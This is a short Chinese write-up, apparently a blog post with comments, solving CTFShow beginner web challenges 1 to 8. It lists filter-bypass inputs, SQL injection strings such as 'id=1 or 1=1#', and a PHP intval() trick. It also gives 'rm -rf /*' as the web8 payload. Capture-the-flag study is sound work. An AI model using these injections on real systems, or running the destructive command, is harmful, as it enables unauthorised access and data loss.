CTFSHOW 萌新计划 web 1-8

>

>

CTFSHOW 萌新计划 web 1-8

_yu_

题目地址：http://ctf.show

web1-7 目的很明确， 构造出id=1000，或者sql语句绕过或者绕过函数。

0x01：进制转换

1.二进制 0b1111101000
2.十六进制 0x38e

0x02：字节操作

1.l两次取反 ~~1000
2.异或 200^800
3,按位与 992|8

0x03：运算符

1.乘法 200*5
2.除法 10/0.01
3.减法 200--80
4.负负 --1000
5.加法 200+800（地址栏输入的话把+换成%2b）

0x04：sql注入构造

id=1 or 1=1#
id=id#

0x05：绕过函数

intval(\$id)会从字符串\$id的起始位置开始去数字碰到非数字就结束,当起始位置为非数字时则为0。
比如
intval(‘100a123’)=100
intval(‘a123’)=0

所以我们只要任意非数字开头就可以了，但是又要满足sql语句
所以有如下几种方式

1.(1000)
2.'1000'

web8是个梗题（根据答案，再看下题目应该就能领会了）
flag=rm -rf /*

Lu-sakura

0¹⁰⁰⁰

100 div 0.1

fgfxf

阿呆缺了个B，所以被通杀了。
0b1111101000